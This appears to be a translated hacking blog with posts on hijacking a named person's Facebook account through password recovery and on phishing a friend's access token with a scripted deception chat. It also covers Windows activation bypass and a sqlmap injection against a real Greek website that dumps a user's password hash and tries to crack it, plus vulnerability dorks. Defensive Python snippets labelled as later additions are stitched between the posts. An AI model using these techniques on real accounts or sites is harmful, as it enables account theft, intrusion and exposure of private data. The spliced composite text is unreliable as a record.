Sunday, 16 June 2013

Sorry, You Are a Victim of Your Own Question (Hack FB Account)

Everything I write on this BLOG is intended purely as a means of PREVENTING FACEBOOK ACCOUNT HACKING. Study and observe CAREFULLY why FACEBOOK can be HACKED. With this KNOWLEDGE, I hope all of YOU will UNDERSTAND BETTER how to PROTECT yourselves against FACEBOOK ACCOUNT HACKING ATTACKS.
1. There is a common question that Newbies often ask without "wanting to know" why Facebook can be hacked.

2. I wanted to find out who he really was. I opened his Facebook and looked at his profile information. It turned out he is "A LECTURER". I thought to myself, why would a TEACHER ask something like this..?? Aaahhh... let's just look at the positive side.

3. I then wanted to try taking over his Facebook account, with the hope and aim of giving him an UNDERSTANDING of how FACEBOOK can be HACKED. So I opened another browser on my computer and opened the FACEBOOK page, then pressed the FORGOT PASSWORD button.

4. On the Facebook account search page, I entered his name based on the information I had obtained from CONTACT INFORMATION.

5. A page then appeared that required filling in 2 phrases. I filled them in.

6. The next page is the process of SENDING A NEW PASSWORD. What happens if I tell FACEBOOK that I can "NO LONGER" USE that E-MAIL address?

7. And Facebook BELIEVED that I really could NO LONGER USE that E-MAIL address, and offered me an ALTERNATIVE E-MAIL address (a new E-MAIL address). Since I have 4 e-mail addresses, I could enter one of them as my new e-mail address.

8. I was then taken to a page that required me to give information (a NEW PASSWORD CODE) to 3 of my friends, whom I designate as the parties who will receive the NEW PASSWORD CODE.

9. So I chose 3 of my friends who were ready to receive a NEW PASSWORD CODE so that I could take back control of my Facebook account.

10. And this is the final result of choosing my friends: 3 people who will receive the NEW PASSWORD CODE. Now it is time to press the Send Code to Friends button.

11. Now it is time for me to contact the 3 friends who have received the NEW PASSWORD CODE, so that I can enter it in the NEW PASSWORD FIELD.

12. I read and followed the next instructions from FACEBOOK in the e-mail that Facebook had sent to my E-MAIL address.

This is the METHOD HACKERS usually use to Take Over someone's Facebook account.

So GOOD steps to prevent this kind of attack are:
A. Hide / Remove (delete) all information on your Facebook.
B. If you want to provide information on the CONTACT INFORMATION page, try to make it FALSE INFORMATION.
C. Change the settings on your Facebook account to be more PRIVATE.

I look forward to SUGGESTIONS & CRITICISM from readers.

Wednesday, 31 October 2012

Solution for the Windows 7 BLANK SCREEN DESKTOP and REMOVING Windows Genuine Activation

The following tutorial is one I wrote to solve the problem of the Desktop Blank Screen on Windows 7 after we successfully log in / log on for the first time (after a restart).

Note that the Blank Screen Desktop on Windows 7 is caused by Windows Genuine Activation (WGA) still being present on our Windows 7 OS after our TRIAL period (30 days) has expired.

Here is the step-by-step for removing WGA and getting rid of the Blank Screen Desktop:
A. GETTING RID OF THE BLANK SCREEN DESKTOP

the method is:
1. open "My Computer" and select the VIEW ALL HIDDEN FOLDERS mode, by choosing the "Organize" menu and then "Folders and Search Options".

Next, select the "VIEW" tab and "UN-CHECK" the following options:

2. once all HIDDEN FOLDERS are visible, go to the FOLDER: " C:\Users\VIXUS\AppData\Roaming\Microsoft\Windows\Themes ".
REMEMBER = REPLACE the name VIXUS with your computer's name.
then DELETE all the files inside that FOLDER.

3. Next we first "DISABLE MICROSOFT WINDOWS UPDATE", by going to the "Control Panel" and choosing the "Windows UPDATE" menu, choosing the "CHANGE SETTINGS" menu and selecting "NEVER CHECK FOR UPDATES".

4. Click OK. Then go back into WINDOWS UPDATE to remove the UPDATE FILE KB971033. To remove it = choose "VIEW UPDATE HISTORY" in the menu on the left, then choose "INSTALLED UPDATES" and use the search facility to find the file "Update KB971033".

Restart your computer.

5. Download "Windows Loader" and install it.
The Windows Loader download can be found at URL = http://sourceforge.net/projects/windows7loader/
Wait until Windows Loader has finished INSTALLING on your computer and RESTART your computer again.

B. REMOVE WGA from Your Computer.

6. First download the software from URL = http://www.softpedia.com/progDownload/RemoveWGA-Download-42782.html
Install the software, wait until it finishes, and restart your computer.

7. Once everything is done, open the PICTURE you want to use as your wallpaper and choose Set As Wallpaper.
With the steps above, your computer NO LONGER HAS A BLANK SCREEN DESKTOP.

Thursday, 25 October 2012

Updating a Facebook Status, but Using a Friend's Facebook Account

This tutorial is a simple one that I took from the blog http://vanz-program.cyber4rt.com; the full version is on the page http://vanz-program.cyber4rt.com/2012/05/update-status-teman-menggunakan.html

The following are the steps for UPDATING A FACEBOOK STATUS while using the FACEBOOK ACCOUNT of our FRIEND.
meaning: after we successfully update the status, that status belongs to our FB friend.

1. Give the following URL to our friend (the prospective victim) in order to learn their Access Token.

https://www.facebook.com/dialog/permissions.request?app_id=2254487659&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token&perms=publish_stream

Use a little flattery + persuasion so that the victim believes you that the LINK is NOT DANGEROUS and is willing to send the URL that contains the ACCESS TOKEN back to you.
Example of the flattery (persuasion) via Facebook chat =

+ hey sis, how are you? is facebook having an ERROR? when I open it via
https://www.facebook.com/dialog/permissions.request?app_id=2254487659&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token&perms=publish_stream it doesn't work..??

does it open on your laptop?

+++ it does, it's actually really smooth on my laptop.

+ haahh... really? try PASTING your facebook URL into our chat here.
:) I'm curious whether it really works or not.

+++ all right, here. bla..bla..bla..

+ okay, thanks. turns out it really works. maybe earlier it was my laptop that was SLOW to load. hehehhee....

for example, here I use the Facebook Access Token belonging to my friend Bahrowi.
( Sorry, my friend. )
>> https://www.facebook.com/messages/bahrowi.wijaya <<

http://www.facebook.com/#access_token=AAAAAAIZAgwGsBAJnZCspBIJAqXzHspNbNFYKKRlBDWPtu0ZBF86rBLEanTDk964qSKtoSj6Dw72IaqVTT1TtXOQHGYRCyEZD&expires_in=0




The Access Token is
AAAAAAIZAgwGsBAJnZCspBIJAqXzHspNbNFYKKRlBDWPtu0ZBF86rBLEanTDk964qSKtoSj6Dw72IaqVTT1TtXOQHGYRCyEZD


2. Use the Facebook Graph to find out their FACEBOOK ID.
the following is the URL for finding a Facebook ID: http://graph.facebook.com/VictimUsername

Example: http://graph.facebook.com/bahrowi.wijaya




3. Time to UPDATE THE STATUS.
The following is the URL that we MUST use.
https://graph.facebook.com/VictimID/feed?method=POST&message=The message to be posted&access_token=AccessToken
example: Access Token + my Facebook ID

https://graph.facebook.com/1633121448/feed?method=POST&message=Bahrowi Maaf ya. AKu UJI COBA LAB. ku&access_token=AAAAAAIZAgwGsBAJnZCspBIJAqXzHspNbNFYKKRlBDWPtu0ZBF86rBLEanTDk964qSKtoSj6Dw72IaqVTT1TtXOQHGYRCyEZD

Then press ENTER.

and if it displays data like the following, it means we HAVE SUCCESSFULLY UPDATED A FACEBOOK STATUS using our friend's account.

Result: we succeeded in updating the status on our victim's account.
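
The whole trick above depends on a URL whose `#access_token=...` fragment is pasted into a chat. As an added example (not part of the original post), here is a small outbound-message filter that redacts such tokens and flags links that ask for one via `response_type=token`; the function names, finding labels and sample messages are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names that carry a bearer credential when they appear in a URL.
SECRET_PARAMS = {"access_token"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def _scrub(pairs):
    """Blank out secret values; return (new_pairs, whether anything was hit)."""
    out, hit = [], False
    for key, value in pairs:
        if key.lower() in SECRET_PARAMS and value:
            out.append((key, "REDACTED"))
            hit = True
        else:
            out.append((key, value))
    return out, hit


def inspect_url(url):
    """Return (safe_url, findings) for one URL.

    carries_token  - a token is present in the query or the #fragment
    requests_token - the link asks the provider to put a token into the
                     redirect URL (response_type=token), as in step 1
    """
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    fragment = parse_qsl(parts.fragment, keep_blank_values=True)
    safe_query, q_hit = _scrub(query)
    safe_fragment, f_hit = _scrub(fragment)

    findings = []
    if q_hit or f_hit:
        findings.append("carries_token")
    if any(k.lower() == "response_type" and "token" in v.lower().split()
           for k, v in query):
        findings.append("requests_token")

    if not (q_hit or f_hit):
        return url, findings          # nothing to redact: keep the URL as typed
    safe = urlunsplit((parts.scheme, parts.netloc, parts.path,
                       urlencode(safe_query), urlencode(safe_fragment)))
    return safe, findings


def scrub_message(text):
    """Redact tokens in every URL of a chat message before it is sent or logged."""
    findings = []

    def replace(match):
        raw = match.group(0)
        url = raw.rstrip(".,;)")      # trailing punctuation is not part of the URL
        safe, found = inspect_url(url)
        findings.extend(found)
        return safe + raw[len(url):]

    return URL_RE.sub(replace, text), findings


# Constructed sample messages (the token value and app_id are made up).
PASTED = "sure, here: http://www.facebook.com/#access_token=CONSTRUCTED0TOKEN&expires_in=0"
LURE = ("can you open https://www.facebook.com/dialog/permissions.request"
        "?app_id=0&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token ?")

if __name__ == "__main__":
    print(scrub_message(PASTED))
    print(scrub_message(LURE))
```

Anything after `#` never reaches the server, so this kind of check has to run where the message is composed or relayed, not in server-side request logs.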



Friday, 10 August 2012

Tutorial SQL Injection with SQL MAP

The following is a tutorial on using SQL MAP to obtain user accounts from the DATABASE of a website.
NB = SQLMAP is a hacking tool that runs on the LINUX OS.
NB = I assume you have already installed the SQLMAP tool on your LINUX OS.

EXPLANATION OF THE OPTIONS =
--dbs          : to find out how many DATABASES there are on the website
--tables       : to find out which tables there are on the website
--columns      : to find out how many columns the table we chose has
--level 5      : to raise our scanning level up to level 5 for the website we scan
--random-agent : for (sorry, I don't know yet)
-D , -T , -C   : Database, Table, Column

Target = http://www.barracuda.gr

1. Open your TERMINAL and change to the directory where you keep SQL MAP.
NB = I re-downloaded SQLMAP and saved the SQLMAP FOLDER on the Desktop of my LINUX BACKTRACK.

once inside the directory / folder where the SQLMAP tool is stored, type this command in your TERMINAL:
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs

in my case the full command line looks like this =
root@bt:~/Desktop/HACK/sqlmap# ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs

the result

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:43:09

[22:43:09] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
[22:43:12] [INFO] testing connection to the target url
[22:43:15] [INFO] testing if the url is stable, wait a few seconds
[22:43:24] [INFO] url is stable
[22:43:24] [INFO] testing if GET parameter 'id' is dynamic
[22:43:26] [INFO] confirming that GET parameter 'id' is dynamic
[22:43:27] [INFO] GET parameter 'id' is dynamic
[22:43:28] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[22:43:28] [INFO] testing for SQL injection on GET parameter 'id'

[22:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:43:37] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:43:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:43:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:43:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

[22:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:45:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found                                                                                                
[22:45:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test                                    
[22:45:48] [INFO] target url appears to have 8 columns in query
[22:45:57] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection points with a total of
21 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[22:46:36] [INFO] testing MySQL
[22:46:40] [INFO] confirming MySQL
[22:46:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[22:46:43] [INFO] fetching database names
[22:46:44] [INFO] the SQL query used returns 2 entries
[22:46:48] [INFO] retrieved: "information_schema"
[22:46:49] [INFO] retrieved: "barrak_db"                                                                                      
available databases [2]:                                                                                                      
[*] barrak_db
[*] information_schema

[22:46:49] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 22:46:49 
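
The boolean-based finding in the output above (`id=50 AND 2597=2597`) means the `id` value ends up inside the SQL text itself. The following added example (not code from the original post or from the scanned site) shows that flaw beside the fix; SQLite stands in for the site's MySQL, and the table contents, function names and the choice of the `article` table are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """Constructed stand-in database (SQLite instead of the site's MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO article VALUES (?, ?)",
                   [(50, "News item 50"), (51, "News item 51")])
    return db


def get_news_vulnerable(db, raw_id):
    """BEFORE: the request value is pasted into the statement.

    Whatever follows the number is parsed as SQL, which is why the
    scanner's probe still returns the article.
    """
    sql = "SELECT id, title FROM article WHERE id = " + raw_id
    return db.execute(sql).fetchone()


def get_news_bound(db, raw_id):
    """Bound parameter only: the value is data and never becomes SQL text."""
    return db.execute("SELECT id, title FROM article WHERE id = ?",
                      (raw_id,)).fetchone()


def get_news_hardened(db, raw_id):
    """AFTER: validate the type first, then bind the value."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a short decimal integer")
    return db.execute("SELECT id, title FROM article WHERE id = ?",
                      (int(raw_id),)).fetchone()


# The probe string is the boolean-based payload printed in the sqlmap output.
PROBE = "50 AND 2597=2597"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_news_vulnerable(db, PROBE))   # article 50 comes back
    print("bound     :", get_news_bound(db, PROBE))        # None: no such id
    try:
        get_news_hardened(db, PROBE)
    except ValueError as exc:
        print("hardened  :", exc)                          # rejected before any query
    print("hardened  :", get_news_hardened(db, "50"))
```

With binding in place the UNION finding disappears as well, because the column list of the query can no longer be extended from the request.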

2. We now know the DATABASES of the website. There are 2 of them, namely barrak_db and information_schema.
now type the following command to find out its tables:
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db --tables

the result

sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org                                                                                                                                                                                               
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                                                               
[*] starting at 22:49:05                                                                                                                                                                       
                                                                                                                                                                                               
[22:49:05] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
[22:49:05] [INFO] resuming back-end DBMS 'mysql'                                                   
[22:49:07] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:                                                                                                           
---                                                                                                                                                                                            
Place: GET                                                                                                                                                                                     
Parameter: id                                                                                                                                                                                  
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---

[22:49:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[22:49:11] [INFO] fetching tables for database: 'barrak_db'

[22:49:13] [INFO] the SQL query used returns 7 entries
[22:49:14] [INFO] retrieved: "article"
[22:49:16] [INFO] retrieved: "newsletter"
[22:49:17] [INFO] retrieved:"offers"
[22:49:18] [INFO] retrieved: "photos_tbl"
[22:49:20] [INFO] retrieved: "products_tbl"
[22:49:21] [INFO] retrieved: "tbl_category"
[22:49:23] [INFO] retrieved: "users"
Database: barrak_db                                                                                                                                                                            
[7 tables]
+--------------+
| article      |
| newsletter   |
| offers       |
| photos_tbl   |
| products_tbl |
| tbl_category |
| users        |
+--------------+



[22:51:40] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 22:51:40 


3. We now know which tables are in that DATABASE.
I am interested in the USERS TABLE; it may contain the NAMES of USERS, including the ADMIN, that are used to LOG IN on the login web page.
Next, type the following command to find out which COLUMNS are in the USERS table:
./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users --columns

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:18:10

[23:18:10] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16                                                                                                                           
[23:18:10] [INFO] resuming back-end DBMS 'mysql'
[23:18:10] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:18:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:18:15] [INFO] fetching columns for table 'users' in database 'barrak_db'

[23:18:15] [INFO] the SQL query used returns 18 entries
[23:18:15] [INFO] resumed: "userid","int(5)"
[23:18:15] [INFO] resumed: "firstname","varchar(30)"
[23:18:15] [INFO] resumed: "lastname","varchar(30)"
[23:18:15] [INFO] resumed: "username","varchar(20)"
[23:18:15] [INFO] resumed: "password","varchar(100)"
[23:18:15] [INFO] resumed: "useraddress","varchar(50)"
[23:18:15] [INFO] resumed: "postalcode","int(8)"
[23:18:15] [INFO] resumed: "perioxi","varchar(30)"
[23:18:15] [INFO] resumed: "poli","varchar(30)"
[23:18:15] [INFO] resumed: "phone","int(10)"
[23:18:15] [INFO] resumed: "usermail","varchar(30)"
[23:18:15] [INFO] resumed: "confirm_hash","varchar(40)"
[23:18:15] [INFO] resumed: "is_confirmed","int(3)"
[23:18:15] [INFO] resumed: "userip","varchar(15)"
[23:18:15] [INFO] resumed: "date_created","date"
[23:18:15] [INFO] resumed: "islogged","int(3)"
[23:18:15] [INFO] resumed: "last_logging","date"
[23:18:15] [INFO] resumed: "user_level","int(3)"
Database: barrak_db                                                                                                                                                                            
Table: users
[18 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| confirm_hash | varchar(40)  |
| date_created | date         |
| firstname    | varchar(30)  |
| is_confirmed | int(3)       |
| islogged     | int(3)       |
| last_logging | date         |
| lastname     | varchar(30)  |
| password     | varchar(100) |
| perioxi      | varchar(30)  |
| phone        | int(10)      |
| poli         | varchar(30)  |
| postalcode   | int(8)       |
| user_level   | int(3)       |
| useraddress  | varchar(50)  |
| userid       | int(5)       |
| userip       | varchar(15)  |
| usermail     | varchar(30)  |
| username     | varchar(20)  |
+--------------+--------------+

[23:18:15] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 23:18:15


4. As expected, there is not only a USERNAME column but also a PASSWORD column.
let's DUMP #devils mode = on
type the following command:
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users -C password,username,usermail,userid,userip,user_level --dump

the result

sqlmap/1.0-dev - automatic SQL injection and database takeover tool 
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:21:13

[23:21:13] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2                                                                                                                                                                                            
[23:21:13] [INFO] resuming back-end DBMS 'mysql'
[23:21:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:21:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:21:18] [INFO] fetching entries of column(s) 'password, user_level, userid, userip, usermail, username' for table 'users' in database 'barrak_db'
[23:21:18] [INFO] the SQL query used returns 1 entries
[23:21:19] [INFO] retrieved: "a65d487491bd8078e3fc7c83db598cbe","3","15","","","barrak"
[23:21:19] [INFO] analyzing table dump for possible password hashes recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [y/N/q] Y
[23:21:22] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/root/Desktop/HACK/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1

[23:21:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] Y

[23:21:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)

[23:21:26] [INFO] starting 4 processes
[23:21:45] [INFO] using suffix '1'
[23:22:03] [INFO] using suffix '123'
[23:22:22] [INFO] using suffix '2'
[23:22:41] [INFO] using suffix '12'
[23:22:59] [INFO] using suffix '3'
[23:23:17] [INFO] using suffix '13'
[23:23:37] [INFO] using suffix '7'
[23:23:56] [INFO] using suffix '11'
[23:24:14] [INFO] using suffix '5'
[23:24:34] [INFO] using suffix '22'
[23:24:53] [INFO] using suffix '23'
[23:25:13] [INFO] using suffix '01'
[23:25:32] [INFO] using suffix '4'
[23:25:50] [INFO] using suffix '07'
[23:26:11] [INFO] using suffix '21'
[23:26:30] [INFO] using suffix '14'
[23:26:49] [INFO] using suffix '10'
[23:27:10] [INFO] using suffix '06'
[23:27:29] [INFO] using suffix '08'
[23:27:50] [INFO] using suffix '8'
[23:28:09] [INFO] using suffix '15'
[23:28:30] [INFO] using suffix '69'
[23:28:49] [INFO] using suffix '16'
[23:29:07] [INFO] using suffix '6'
[23:29:25] [INFO] using suffix '18'
[23:29:43] [INFO] using suffix '!'
[23:30:02] [INFO] using suffix '.'
[23:30:21] [INFO] using suffix '*'
[23:30:41] [INFO] using suffix '!!'
[23:31:01] [INFO] using suffix '?'
[23:31:20] [INFO] using suffix ';'
[23:31:39] [INFO] using suffix '..'
[23:31:58] [INFO] using suffix '!!!'
[23:32:16] [INFO] using suffix ','
[23:32:36] [INFO] using suffix '@'
[23:32:55] [INFO] writing uncracked hashes to file '/tmp/tmps5Ogjj.txt' for eventual further processing
[23:32:55] [WARNING] no clear password(s) found
[23:32:55] [INFO] postprocessing table dump
Database: barrak_db
Table: users
[1 entry]
+--------+---------+----------+----------+----------------------------------+------------+
| userid | userip  | username | usermail | password                         | user_level |
+--------+---------+----------+----------+----------------------------------+------------+
| 15     | <blank> | barrak   | <blank>  | a65d487491bd8078e3fc7c83db598cbe | 3          |
+--------+---------+----------+----------+----------------------------------+------------+

[23:32:55] [INFO] table 'barrak_db.users' dumped to CSV file '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr/dump/barrak_db/users.csv'
[23:32:55] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 23:32:55 


DAMN....!!!!
The PASSWORD is not a NAKED (plaintext) PASSWORD.
so we have to DECRYPT the password first.
COUNT the length of the PASSWORD HASH (it is 32 bits long), which means it probably uses MD5 ENCRYPTION.
let's try to decrypt it using an ONLINE MD5 DECRYPTOR.
or, as an alternative, we use " WWW.GOOGLE.COM "
type the PASSWORD HASH into GOOGLE
and this is the result

we can also confirm it through the PASTEBIN LINK

This time I WAS NOT LUCKY + have not yet had the time to DECRYPT the password.
Hopefully there will be time to play around with this PASSWORD.
(:
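
The `password` column in the dump holds a 32-character hexadecimal value, the shape of an unsalted MD5 digest, which is why a search engine or a public lookup table can be tried against it at all. As an added example (not from the original post, and not the site's code), this sketch finds records of that shape and replaces them with a salted, slow hash the next time the owner logs in; the record format, names and iteration count are assumptions.

```python
import hashlib
import hmac
import os
import re

MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")   # shape of the value seen in the dump
ITERATIONS = 600_000                          # assumed work factor for PBKDF2-SHA256
PREFIX = "pbkdf2_sha256"


def classify(stored):
    """Tell legacy unsalted MD5 records apart from upgraded ones."""
    if stored.startswith(PREFIX + "$"):
        return PREFIX
    if MD5_HEX.match(stored):
        return "legacy_md5"
    return "unknown"


def hash_password(password, iterations=ITERATIONS):
    """Per-user random salt + slow KDF: equal passwords give different records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{PREFIX}${iterations}${salt.hex()}${dk.hex()}"


def verify_and_upgrade(password, stored):
    """Return (ok, replacement).

    replacement is a new record to write back when a legacy MD5 entry
    has just been verified; otherwise it is None.
    """
    kind = classify(stored)
    if kind == "legacy_md5":
        candidate = hashlib.md5(password.encode()).hexdigest()
        ok = hmac.compare_digest(candidate, stored.lower())
        return ok, (hash_password(password) if ok else None)
    if kind == PREFIX:
        try:
            _, iterations, salt_hex, dk_hex = stored.split("$")
            dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
        except ValueError:
            return False, None                # malformed record
        return hmac.compare_digest(dk.hex(), dk_hex), None
    return False, None


def audit(rows):
    """List usernames whose stored hash is still in the legacy format."""
    return [user for user, stored in rows if classify(stored) == "legacy_md5"]


# Constructed sample rows; the password and usernames are made up.
SAMPLE_PASSWORD = "constructed-sample"
SAMPLE_ROWS = [
    ("alice", hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()),
    ("bob", hash_password("another-constructed-sample")),
]

if __name__ == "__main__":
    print("legacy records:", audit(SAMPLE_ROWS))
    ok, replacement = verify_and_upgrade(SAMPLE_PASSWORD, SAMPLE_ROWS[0][1])
    print("login ok:", ok, "| upgraded record kind:", classify(replacement))
```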

Saturday, 04 August 2012

ALL DORK

1. To enter (bypass account and password) a MYSQL DATABASE:
open www.google.com and type allinurl:index.php?db=information_schema
2. For an SQL Injection dork:
open Google and type => inurl:newsone.php?id=

Monday, 16 July 2012

Change Default Searching on Mozilla Firefox

This tutorial focuses on changing the default web search in the Mozilla Firefox browser.
Let's get to the main topic.
1. Open your Firefox browser and type "about:config" in the URL address bar.
Choose the "I'll be careful, I promise" option to open the address search box.

2. Then type "keyword.url" in the address search box, as in the picture below:

3. Double-click that entry and then type "http://www.google.com/search?ie=UTF-8&oe=utf-8&q="

4. Restart your Firefox browser.